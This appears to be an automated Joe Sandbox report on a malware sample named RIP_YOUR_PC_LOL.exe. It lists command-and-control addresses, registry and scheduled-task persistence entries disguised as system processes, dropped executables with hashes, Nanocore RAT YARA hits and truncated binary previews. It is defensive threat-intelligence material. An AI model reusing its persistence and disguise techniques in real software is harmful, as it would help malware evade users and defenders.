                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNPluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        179.13.1.253
                                                                                                        		gfhhjgh.duckdns.orgColombia
                                                                                                        		27831ColombiaMovilCOfalse
                                                                                                        172.98.92.42
                                                                                                        		unknownUnited States
                                                                                                        		46562TOTAL-SERVER-SOLUTIONSUSfalse
                                                                                                        41.249.51.34
                                                                                                        		kazya1.hopto.orgMorocco
                                                                                                        		36903MT-MPLSMAfalse
                                                                                                        52.20.78.240
                                                                                                        		api.ipify.org.herokudns.comUnited States
                                                                                                        		14618AMAZON-AESUSfalse
                                                                                                        80.87.192.115
                                                                                                        		unknownRussian Federation
                                                                                                        		29182THEFIRST-ASRUfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                        Analysis ID:585264
                                                                                                        Start date:08.03.2022
                                                                                                        Start time:17:59:22
                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                        Overall analysis duration:0h 15m 34s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Sample file name:RIP_YOUR_PC_LOL.exe
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                        Number of analysed new started processes analysed:61
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • HDC enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@84/32@48/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 83.3%
                                                                                                        HDC Information:
                                                                                                        • Successful, ratio: 15.8% (good quality ratio 14.3%)
                                                                                                        • Quality average: 70.3%
                                                                                                        • Quality standard deviation: 31.5%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 83%
                                                                                                        • Number of executed functions: 155
                                                                                                        • Number of non-executed functions: 30
                                                                                                        Cookbook Comments:
                                                                                                        • Adjust boot time
                                                                                                        • Enable AMSI
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.26.13.31, 172.67.75.172, 104.26.12.31, 20.190.160.129, 20.190.160.75, 20.190.160.6, 20.190.160.136, 20.190.160.73, 20.190.160.132, 20.190.160.69, 20.190.160.67, 20.42.65.92, 20.82.209.104, 80.67.82.211, 80.67.82.235
                                                                                                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, www.tm.a.prd.aadg.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                        • Execution Graph export aborted for target test.exe, PID 6236 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        18:01:04API Interceptor1x Sleep call for process: aaa.exe modified
                                                                                                        18:01:13AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                                        18:01:14Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Roaming\Opus.exe" s>$(Arg0)
                                                                                                        18:01:22Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                                                                                        18:01:22API Interceptor88x Sleep call for process: Opus.exe modified
                                                                                                        18:01:23AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                                                                                                        18:01:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                                                                                                        18:01:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
                                                                                                        18:02:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                                                                                                        18:02:48Task SchedulerRun new task: dwm path: "C:\Windows\System32\srvsvc\dwm.exe"
                                                                                                        18:02:51Task SchedulerRun new task: conhost path: "C:\Windows\System32\mssip32\conhost.exe"
                                                                                                        18:02:52Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\System32\WindowsDefaultHeatProcessor\RuntimeBroker.exe"
                                                                                                        18:02:52Task SchedulerRun new task: services path: "C:\Users\Public\Documents\My Music\services.exe"
                                                                                                        18:02:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                                        18:02:55Task SchedulerRun new task: 8f1c8b40c7be588389a8d382040b23bb path: "C:\Documents and Settings\Public\Desktop\8f1c8b40c7be588389a8d382040b23bb.exe"
                                                                                                        18:02:55Task SchedulerRun new task: explorer path: "C:\Windows\winhlp32\explorer.exe"
                                                                                                        18:02:55Task SchedulerRun new task: mediaget path: "C:\Windows\CbsTemp\mediaget.exe"
                                                                                                        18:03:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                                        18:03:12AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\System32\srvsvc\dwm.exe"
                                                                                                        18:03:22AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\System32\WindowsDefaultHeatProcessor\RuntimeBroker.exe"

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        No context

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASNs

                                                                                                        No context

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208384
                                                                                                        Entropy (8bit):7.449669736966968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cLV6Bta6dtJmakIM5zEN/wjwJsvle+o9f/N:cLV6Btpmk1Elepd
                                                                                                        MD5:759185EE3724D7563B709C888C696959
                                                                                                        SHA1:7C166CC3CBFEF08BB378BCF557B1F45396A22931
                                                                                                        SHA-256:9384798985672C356A8A41BF822443F8EB0D3747BFCA148CE814594C1A894641
                                                                                                        SHA-512:ED754357B1B995DE918AF21FECD9D1464BDEA6778F7AB450A34E3AAE22BA7EEBC02F2442AF13774ABFDF97954E419EC9E356B54506C7E3BF12E3B76EE882FA2C
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 85%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... ..$`........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...$`... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..

                                                                                                        C:\ProgramData\kaosdma.txt

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10
                                                                                                        Entropy (8bit):2.6464393446710157
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:HLLv:fv
                                                                                                        MD5:7AE4BED9A9648A53C3508D11671EF714
                                                                                                        SHA1:C349F54BAAA203AB3DC98498C49851C0704DD217
                                                                                                        SHA-256:C355B022F11CFAD7126BBD035784DAB1E94C3604D1528A130465E823C6EC1149
                                                                                                        SHA-512:7E3C40C668FAA94C9C1420B70405F41181BAE21F906C48164828E5427F66950483C4056E48C1FFF56634A5CDD943E5B1E40B8BEC798F4349E46263B21D7E1C6E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:84.17.52.7

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RIP_YOUR_PC_LOL.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):128
                                                                                                        Entropy (8bit):5.185983766127119
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QHXMKaZImrnLCR2RAVIAQyz2QyDBLnDLFv:Q3LadLCR22IAQykdL1v
                                                                                                        MD5:1F5C279D069793BFDB15F6DAC63D5C39
                                                                                                        SHA1:EFA436296EE3BC196FFC4FBD48978A4A1BB6FD34
                                                                                                        SHA-256:007D94877B5C9048FDC238CF6E63516F2BF398588878947E1DC4A4E55553602D
                                                                                                        SHA-512:48270029CAB2C46093058BDB28795ECA137656C1B4EB9E1EFD2111EA42997B29312B7A0EBFD6EB411375F799754D2403C233D0FF6B65103AEFABDE68268ED747
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aaa.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\aaa.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):525
                                                                                                        Entropy (8bit):5.2874233355119316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                                                                                                        MD5:80EFBEC081D7836D240503C4C9465FEC
                                                                                                        SHA1:6AF398E08A359457083727BAF296445030A55AC3
                                                                                                        SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                                                                                                        SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\gay.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):525
                                                                                                        Entropy (8bit):5.2874233355119316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                                                                                                        MD5:80EFBEC081D7836D240503C4C9465FEC
                                                                                                        SHA1:6AF398E08A359457083727BAF296445030A55AC3
                                                                                                        SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                                                                                                        SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\healastounding.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):128
                                                                                                        Entropy (8bit):5.185983766127119
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QHXMKaZImrnLCR2RAVIAQyz2QyDBLnDLFv:Q3LadLCR22IAQykdL1v
                                                                                                        MD5:1F5C279D069793BFDB15F6DAC63D5C39
                                                                                                        SHA1:EFA436296EE3BC196FFC4FBD48978A4A1BB6FD34
                                                                                                        SHA-256:007D94877B5C9048FDC238CF6E63516F2BF398588878947E1DC4A4E55553602D
                                                                                                        SHA-512:48270029CAB2C46093058BDB28795ECA137656C1B4EB9E1EFD2111EA42997B29312B7A0EBFD6EB411375F799754D2403C233D0FF6B65103AEFABDE68268ED747
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\5JOCE52U.txt

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10
                                                                                                        Entropy (8bit):2.6464393446710157
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:HLLv:fv
                                                                                                        MD5:7AE4BED9A9648A53C3508D11671EF714
                                                                                                        SHA1:C349F54BAAA203AB3DC98498C49851C0704DD217
                                                                                                        SHA-256:C355B022F11CFAD7126BBD035784DAB1E94C3604D1528A130465E823C6EC1149
                                                                                                        SHA-512:7E3C40C668FAA94C9C1420B70405F41181BAE21F906C48164828E5427F66950483C4056E48C1FFF56634A5CDD943E5B1E40B8BEC798F4349E46263B21D7E1C6E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:84.17.52.7

                                                                                                        C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335872
                                                                                                        Entropy (8bit):7.696824069546379
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:WLR0mFZcyJuOwhXdZkWwQ5eRI44axa7AP5Mb:8RHTJuOwhNZkWwQURI4xxa70ab
                                                                                                        MD5:870D6E5AEF6DEA98CED388CCE87BFBD4
                                                                                                        SHA1:2D7EEE096D38D3C2A8F12FCBA0A44B4C4DA33D54
                                                                                                        SHA-256:6D50833895B2E3EB9D6F879A6436660127C270B6A516CDA0253E56A3D8B7FBA0
                                                                                                        SHA-512:0D55AB28B2F80136AF121B870B7503551D87BBEB2848CF9A32540006CAC9A5E346D9FCCE2BF1223A22927F72A147B81487533A10B91373D4FA4429D6159FD566
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.a..................... .......Y............@..........................0.......F......................................T...P.... ..t...............................................................................d............................text............................... ..`.data...............................@....rsrc...t.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):290816
                                                                                                        Entropy (8bit):7.605066056188275
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:7S0BFZcouRlCLNkbI7u2KrMmCI44axa7AR5Mp:7SkZolCLybI7xI4xxa7Wap
                                                                                                        MD5:78D40B12FFC837843FBF4DE2164002F6
                                                                                                        SHA1:985BDFFA69BB915831CD6B81783AEF3AE4418F53
                                                                                                        SHA-256:308A15DABDC4CE6B96DD54954A351D304F1FCB59E8C93221BA1C412BCDFD1C44
                                                                                                        SHA-512:C6575E1771D37DED4089D963BEA95DEAC78B329ED555C991D7C559EE1970DD0887A965E88C09981529ADC9C25DF5CFD3D57E3DCE6724DA1F01F1198F0F460B79
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w>.a.................@... ...............P....@..................................I.......................................D..P....p..t...............................................................................d............................text....:.......@.................. ..`.data........P.......P..............@....rsrc...t....p.......`..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\tmp4896.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1305
                                                                                                        Entropy (8bit):5.090556205433367
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0V75xtn:cbk4oL600QydbQxIYODOLedq3K5j
                                                                                                        MD5:1211D31E3B2DF2F76E97FEF49A693566
                                                                                                        SHA1:47DA0FC84FEF52FE80D25341A9A2DC97117841F3
                                                                                                        SHA-256:8DD44C774959C9CA5E2557721C4C09ACCC5C5307F426D4A015AEF61A8410F45C
                                                                                                        SHA-512:05DE66143F4D1FCAE7BB927CF508AFD02DFA910D2D244D0EDD7545A9BF9F4B478C3B00D387C84495A14865BCF565D3A25201E6E61C85DE7DB37E4EA4938C1E49
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                                                                        C:\Users\user\AppData\Local\Temp\tmp5D87.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1310
                                                                                                        Entropy (8bit):5.109425792877704
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                                                        MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                                                        SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                                                        SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                                                        SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                                                                        C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):549556
                                                                                                        Entropy (8bit):6.964847007042997
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:eKmlz464jAfhe5pUC1jAXBoFACBfz6JMW0rwrsu:oz4d/5iCj0BoNBb6Jh3
                                                                                                        MD5:0FD7DE5367376231A788872005D7ED4F
                                                                                                        SHA1:658E4D5EFB8B14661967BE2183CC60E3E561B2B6
                                                                                                        SHA-256:9083992637E90E412E6F4E77331EB69EE8DB821C54BBC38533E0F889CC4CA9DD
                                                                                                        SHA-512:522D5BE2803FBCE0D12C325CC2EF1E3A92CEC03AEBA7D1164530093AD58CAECD827DD557CA3C182A66C6667150E731DE37BB552D19425F96CC78FE3423E1A863
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .4.d.Z.d.Z.d.Z.z..u.Z.z....Z.z..S.Z.CC!.g.Z.d.[..Z.z..e.Z.z..e.Z.z..e.Z.Richd.Z.................PE..L....:._............................. ............@.................................d.......................................8Y..(....................*...8..........P................................O..@............................................text...0........................... ..`.rdata..............................@..@.data........p.......T..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\22.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2101248
                                                                                                        Entropy (8bit):7.055994450169564
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:XkSw2TRlsQ1k0+eDE/C9fLtGoDs9cXpJGy:0EHZ/rDjfLe9cy
                                                                                                        MD5:DBF9DAA1707B1037E28A6E0694B33A4B
                                                                                                        SHA1:DDC1FCEC1C25F2D97C372FFFA247969AA6CD35EF
                                                                                                        SHA-256:A604A3FF78644533FAC5EE9F198E9C5F2FA1AE2A5828186367A9E00935CFF6B6
                                                                                                        SHA-512:145B606FFD58554050FF8712DDB38C1C66DD5F33EA15FD48474E1C165B2C0348D2413E16C7AD07FF1C65CE71E2BE23E3758E6D48C4F2454D5407982119706BFD
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Roaming\22.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 38%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
